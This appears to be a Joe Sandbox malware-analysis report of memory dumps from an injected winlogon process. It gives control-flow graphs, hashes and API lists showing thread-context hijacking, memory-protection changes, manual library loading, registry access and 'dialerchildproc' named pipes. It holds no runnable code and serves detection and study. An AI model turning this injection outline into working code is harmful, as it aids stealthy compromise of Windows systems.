                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                          • String ID: wr
                                                                                                                                          • API String ID: 1092925422-2678910430
                                                                                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                          • Instruction ID: 5b5ece5b16f05410ef88fc7334ca4b30fcb2165cfe8f9a178b0778bd0effcbe9
                                                                                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                          • Instruction Fuzzy Hash: 96118B2A318F5493EF549BA9E408269B2A0FB88F86F148038DF8A03B94EF3DC505C704
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 59 225dc645b30-225dc645b57 60 225dc645b59-225dc645b68 59->60 61 225dc645b6b-225dc645b76 GetCurrentThreadId 59->61 60->61 62 225dc645b78-225dc645b7d 61->62 63 225dc645b82-225dc645b89 61->63 64 225dc645faf-225dc645fc6 call 225dc647940 62->64 65 225dc645b9b-225dc645baf 63->65 66 225dc645b8b-225dc645b96 call 225dc645960 63->66 69 225dc645bbe-225dc645bc4 65->69 66->64 72 225dc645bca-225dc645bd3 69->72 73 225dc645c95-225dc645cb6 69->73 75 225dc645c1a-225dc645c8d call 225dc644510 call 225dc6444b0 call 225dc644470 72->75 76 225dc645bd5-225dc645c18 call 225dc6485c0 72->76 78 225dc645cbc-225dc645cdc GetThreadContext 73->78 79 225dc645e1f-225dc645e30 call 225dc6474bf 73->79 87 225dc645c90 75->87 76->87 83 225dc645e1a 78->83 84 225dc645ce2-225dc645d03 78->84 90 225dc645e35-225dc645e3b 79->90 83->79 84->83 93 225dc645d09-225dc645d12 84->93 87->69 94 225dc645e41-225dc645e98 VirtualProtect FlushInstructionCache 90->94 95 225dc645efe-225dc645f0e 90->95 97 225dc645d92-225dc645da3 93->97 98 225dc645d14-225dc645d25 93->98 101 225dc645ec9-225dc645ef9 call 225dc6478ac 94->101 102 225dc645e9a-225dc645ea4 94->102 106 225dc645f1e-225dc645f2a call 225dc644df0 95->106 107 225dc645f10-225dc645f17 95->107 103 225dc645e15 97->103 104 225dc645da5-225dc645dc3 97->104 99 225dc645d27-225dc645d3c 98->99 100 225dc645d8d 98->100 99->100 108 225dc645d3e-225dc645d88 call 225dc643970 SetThreadContext 99->108 100->103 101->90 102->101 109 225dc645ea6-225dc645ec1 call 225dc644390 102->109 104->103 110 225dc645dc5-225dc645e10 call 225dc643900 call 225dc6474dd 104->110 120 225dc645f2f-225dc645f35 106->120 107->106 112 225dc645f19 call 225dc6443e0 107->112 108->100 109->101 110->103 112->106 124 225dc645f77-225dc645f95 120->124 125 225dc645f37-225dc645f75 ResumeThread call 225dc6478ac 120->125 128 225dc645fa9 124->128 129 225dc645f97-225dc645fa6 124->129 125->120 128->64 129->128
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Thread$Current$Context
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1666949209-0
                                                                                                                                          • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                                                                          • Instruction ID: f245da02ec037058e9828f5728e6f8f7909b60f63258dcba4de34453af5a61e8
                                                                                                                                          • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                                                                          • Instruction Fuzzy Hash: B9D1997A20CF9896DA70DB4AE49835A7BA0F7C8B85F104156EACE47BA5DF3CC541CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 131 225dc6450d0-225dc6450fc 132 225dc64510d-225dc645116 131->132 133 225dc6450fe-225dc645106 131->133 134 225dc645127-225dc645130 132->134 135 225dc645118-225dc645120 132->135 133->132 136 225dc645141-225dc64514a 134->136 137 225dc645132-225dc64513a 134->137 135->134 138 225dc64514c-225dc645151 136->138 139 225dc645156-225dc645161 GetCurrentThreadId 136->139 137->136 140 225dc6456d3-225dc6456da 138->140 141 225dc645163-225dc645168 139->141 142 225dc64516d-225dc645174 139->142 141->140 143 225dc645176-225dc64517c 142->143 144 225dc645181-225dc64518a 142->144 143->140 145 225dc64518c-225dc645191 144->145 146 225dc645196-225dc6451a2 144->146 145->140 147 225dc6451a4-225dc6451c9 146->147 148 225dc6451ce-225dc645225 call 225dc6456e0 * 2 146->148 147->140 153 225dc64523a-225dc645243 148->153 154 225dc645227-225dc64522e 148->154 155 225dc645255-225dc64525e 153->155 156 225dc645245-225dc645252 153->156 157 225dc645236 154->157 158 225dc645230 154->158 159 225dc645273-225dc645298 call 225dc647870 155->159 160 225dc645260-225dc645270 155->160 156->155 157->153 162 225dc6452a6-225dc6452aa 157->162 161 225dc6452b0-225dc6452b6 158->161 170 225dc64532d-225dc645342 call 225dc643cc0 159->170 171 225dc64529e 159->171 160->159 164 225dc6452e5-225dc6452eb 161->164 165 225dc6452b8-225dc6452d4 call 225dc644390 161->165 162->161 168 225dc645315-225dc645328 164->168 169 225dc6452ed-225dc64530c call 225dc6478ac 164->169 165->164 175 225dc6452d6-225dc6452de 165->175 168->140 169->168 178 225dc645351-225dc64535a 170->178 179 225dc645344-225dc64534c 170->179 171->162 175->164 180 225dc64536c-225dc6453ba call 225dc648c60 178->180 181 225dc64535c-225dc645369 178->181 179->162 184 225dc6453c2-225dc6453ca 180->184 181->180 185 225dc6454d7-225dc6454df 184->185 186 225dc6453d0-225dc6454bb call 225dc647440 184->186 187 225dc6454e1-225dc6454f4 call 225dc644590 185->187 188 225dc645523-225dc64552b 185->188 194 225dc6454bd 186->194 195 225dc6454bf-225dc6454ce call 225dc644060 186->195 203 225dc6454f6 187->203 204 225dc6454f8-225dc645521 187->204 191 225dc645537-225dc645546 188->191 192 225dc64552d-225dc645535 188->192 198 225dc645548 191->198 199 225dc64554f 191->199 192->191 197 225dc645554-225dc645561 192->197 194->185 208 225dc6454d2 195->208 209 225dc6454d0 195->209 200 225dc645563 197->200 201 225dc645564-225dc6455b9 call 225dc6485c0 197->201 198->199 199->197 200->201 210 225dc6455bb-225dc6455c3 201->210 211 225dc6455c8-225dc645661 call 225dc644510 call 225dc644470 VirtualProtect 201->211 203->188 204->185 208->184 209->185 216 225dc645671-225dc6456d1 211->216 217 225dc645663-225dc645668 GetLastError 211->217 216->140 217->216
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2882836952-0
                                                                                                                                          • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                                                                          • Instruction ID: ca8f9a462bd9996edb27ee4ecd3a9b3d43bbe2f9124c1ca87dd336038b8394af
                                                                                                                                          • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                                                                          • Instruction Fuzzy Hash: 1102C83661DF9496EB60CB99E49436AB7A1F3C4795F104056EA8E87BA8DF7CC444CF00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$AllocQuery
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 31662377-0
                                                                                                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                                          • Instruction ID: 3d7c28a49f1379a387e1eab8d3c47744672dc9424a01523034e22865a73a9f88
                                                                                                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                                          • Instruction Fuzzy Hash: 7F31302625DE98A1EA30DB9DE05835E76A1F388B85F108575F6CF46BA8DF7CC180CB04
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1683269324-0
                                                                                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                          • Instruction ID: 7d3d60018f90cf45d3bc6b126cf75a44508ad4678cf0a9f52ef5460c3c2565a3
                                                                                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                          • Instruction Fuzzy Hash: 7011C07C62CEA8B2FB619BE8F90C3993295AB54B47F50C1B4EB0781690EF78C044C240
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3733156554-0
                                                                                                                                          • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                                                                          • Instruction ID: 7e590623df8fc7209075b22fdaf8685971673eb90f371bc8902be2096d1f9670
                                                                                                                                          • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                                                                          • Instruction Fuzzy Hash: 9FF03A2A21CF24D0D630DB89E44976ABBA0F788BD5F148151FA8E43B69CE3CC681CF00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 265 225dc61273c-225dc6127a4 call 225dc6129d4 * 4 274 225dc6127aa-225dc6127ad 265->274 275 225dc6129b2 265->275 274->275 277 225dc6127b3-225dc6127b6 274->277 276 225dc6129b4-225dc6129d0 275->276 277->275 278 225dc6127bc-225dc6127bf 277->278 278->275 279 225dc6127c5-225dc6127e6 VirtualAlloc 278->279 279->275 280 225dc6127ec-225dc61280c 279->280 281 225dc612838-225dc61283f 280->281 282 225dc61280e-225dc612836 280->282 283 225dc612845-225dc612852 281->283 284 225dc6128df-225dc6128e6 281->284 282->281 282->282 283->284 285 225dc612858-225dc61286a LoadLibraryA 283->285 286 225dc6128ec-225dc612901 284->286 287 225dc612992-225dc6129b0 284->287 288 225dc6128ca-225dc6128d2 285->288 289 225dc61286c-225dc612878 285->289 286->287 290 225dc612907 286->290 287->276 288->285 293 225dc6128d4-225dc6128d9 288->293 292 225dc6128c5-225dc6128c8 289->292 291 225dc61290d-225dc612921 290->291 295 225dc612982-225dc61298c 291->295 296 225dc612923-225dc612934 291->296 292->288 297 225dc61287a-225dc61287d 292->297 293->284 295->287 295->291 298 225dc612936-225dc61293d 296->298 299 225dc61293f-225dc612943 296->299 300 225dc6128a7-225dc6128b7 297->300 301 225dc61287f-225dc6128a5 297->301 303 225dc612970-225dc612980 298->303 304 225dc612945-225dc61294b 299->304 305 225dc61294d-225dc612951 299->305 306 225dc6128ba-225dc6128c1 300->306 301->306 303->295 303->296 304->303 307 225dc612963-225dc612967 305->307 308 225dc612953-225dc612961 305->308 306->292 307->303 310 225dc612969-225dc61296c 307->310 308->303 310->303
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocLibraryLoadVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3550616410-0
                                                                                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                          • Instruction ID: b5a9ffdff3e85ff3f1f12f145a610503c53f3502f35e5ceb3ac916478b11310c
                                                                                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                          • Instruction Fuzzy Hash: D261363AB02AA097DF56CF5ED00876DB392F754BA6F18C521CE5907788DA38D852C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00000225DC641628: GetProcessHeap.KERNEL32 ref: 00000225DC641633
                                                                                                                                            • Part of subcall function 00000225DC641628: HeapAlloc.KERNEL32 ref: 00000225DC641642
                                                                                                                                            • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416B2
                                                                                                                                            • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DF
                                                                                                                                            • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
                                                                                                                                            • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641719
                                                                                                                                            • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641734
                                                                                                                                            • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641754
                                                                                                                                            • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64176F
                                                                                                                                            • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64178F
                                                                                                                                            • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
                                                                                                                                            • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417CA
                                                                                                                                          • Sleep.KERNEL32 ref: 00000225DC641AD7
                                                                                                                                          • SleepEx.KERNEL32 ref: 00000225DC641ADD
                                                                                                                                            • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
                                                                                                                                            • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641805
                                                                                                                                            • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641820
                                                                                                                                            • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641840
                                                                                                                                            • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64185B
                                                                                                                                            • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64187B
                                                                                                                                            • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641896
                                                                                                                                            • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6418A0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1534210851-0
                                                                                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                          • Instruction ID: b89290e72799dd3975187c06206b195ef9f7eec7f326f7ac498d84b976088364
                                                                                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                          • Instruction Fuzzy Hash: 0731356921CE61B2FF509BAED6593A933A4AB54BC6F04D4A19E0F873E5FF30C451C210
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 350 225dc67273c-225dc6727a4 call 225dc6729d4 * 4 359 225dc6727aa-225dc6727ad 350->359 360 225dc6729b2 350->360 359->360 362 225dc6727b3-225dc6727b6 359->362 361 225dc6729b4-225dc6729d0 360->361 362->360 363 225dc6727bc-225dc6727bf 362->363 363->360 364 225dc6727c5-225dc6727e6 VirtualAlloc 363->364 364->360 365 225dc6727ec-225dc67280c 364->365 366 225dc672838-225dc67283f 365->366 367 225dc67280e-225dc672836 365->367 368 225dc672845-225dc672852 366->368 369 225dc6728df-225dc6728e6 366->369 367->366 367->367 368->369 372 225dc672858-225dc67286a 368->372 370 225dc6728ec-225dc672901 369->370 371 225dc672992-225dc6729b0 369->371 370->371 373 225dc672907 370->373 371->361 379 225dc67286c-225dc672878 372->379 380 225dc6728ca-225dc6728d2 372->380 375 225dc67290d-225dc672921 373->375 377 225dc672923-225dc672934 375->377 378 225dc672982-225dc67298c 375->378 383 225dc672936-225dc67293d 377->383 384 225dc67293f-225dc672943 377->384 378->371 378->375 385 225dc6728c5-225dc6728c8 379->385 380->372 381 225dc6728d4-225dc6728d9 380->381 381->369 386 225dc672970-225dc672980 383->386 387 225dc672945-225dc67294b 384->387 388 225dc67294d-225dc672951 384->388 385->380 389 225dc67287a-225dc67287d 385->389 386->377 386->378 387->386 392 225dc672963-225dc672967 388->392 393 225dc672953-225dc672961 388->393 390 225dc6728a7-225dc6728b7 389->390 391 225dc67287f-225dc6728a5 389->391 394 225dc6728ba-225dc6728c1 390->394 391->394 392->386 395 225dc672969-225dc67296c 392->395 393->386 394->385 395->386
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891941444.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc670000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                          • Instruction ID: c822286e1b467df8a310eb99b0d592360f537eec13a50740bd2f5dfddf19021e
                                                                                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                          • Instruction Fuzzy Hash: A561483AB01AA0D7DB56CF9AD00876DB3A2F754BA5F18C921CF5907BC8DA38D852C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 397 225dc6ad6cc-225dc6ad6db 398 225dc6ad6dd-225dc6ad6e9 397->398 399 225dc6ad6eb-225dc6ad6fb 397->399 398->399 400 225dc6ad72e-225dc6ad739 call 225dc6ad6ac 398->400 401 225dc6ad712-225dc6ad72a HeapAlloc 399->401 407 225dc6ad73b-225dc6ad740 400->407 402 225dc6ad6fd-225dc6ad704 call 225dc6b0720 401->402 403 225dc6ad72c 401->403 402->400 409 225dc6ad706-225dc6ad710 call 225dc6ab85c 402->409 403->407 409->400 409->401
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2892199360.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc6a0000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocHeap
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                          • Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                                                                                                          • Instruction ID: d48ce241fd5c6b57c9d66a3839ec59588558f897ab86195e616c0656e38ee758
                                                                                                                                          • Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                                                                                                          • Instruction Fuzzy Hash: 21F05E6C301E2161FE6DDBEE995D3A552955F89B82F6CE4344D0AC67E2EE3CC481C620
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                          • Instruction ID: a0dd4a3191c2f22ec65cd5f9c7d8c34c65d38d6a3a9ca6151c6be4ce44add157
                                                                                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                          • Instruction Fuzzy Hash: 29318376219F909AEB609FA4E8447ED73A0F784745F44812ADB4E57B94EF38C548CB10
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                                          • API String ID: 190073905-1786718095
                                                                                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                          • Instruction ID: 7539ecd07ed9e19813cea4b70ed8e4e8e5b401edcb5cd18e99020899339b4ff2
                                                                                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                          • Instruction Fuzzy Hash: DF81122D702E71A6FE60EBED944D35962E0EB95783F18C425AB4983797EF38C946C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetLastError.KERNEL32 ref: 00000225DC64CE37
                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE4C
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE6D
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CE9A
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEAB
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CEBC
                                                                                                                                          • SetLastError.KERNEL32 ref: 00000225DC64CED7
                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF0D
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000225DC64ECCC,?,?,?,?,00000225DC64BF9F,?,?,?,?,?,00000225DC647AB0), ref: 00000225DC64CF2C
                                                                                                                                            • Part of subcall function 00000225DC64D6CC: HeapAlloc.KERNEL32 ref: 00000225DC64D721
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF54
                                                                                                                                            • Part of subcall function 00000225DC64D744: HeapFree.KERNEL32 ref: 00000225DC64D75A
                                                                                                                                            • Part of subcall function 00000225DC64D744: GetLastError.KERNEL32 ref: 00000225DC64D764
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF65
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF76
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 570795689-0
                                                                                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                          • Instruction ID: c96d39c070731bccc58dc25472949b9c8324ede58aceb138708ddbc32eb2cb43
                                                                                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                          • Instruction Fuzzy Hash: 3B41AB2C34CE64B6FE68A7FD955D36932825F857B2F24C7A4A937467E6DF388442C200
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                                          • API String ID: 2171963597-1373409510
                                                                                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                          • Instruction ID: 1de5ddcc8f1dfc1167620b25f9dc58926eb66b08d3309719a253bb24b32ba1e0
                                                                                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
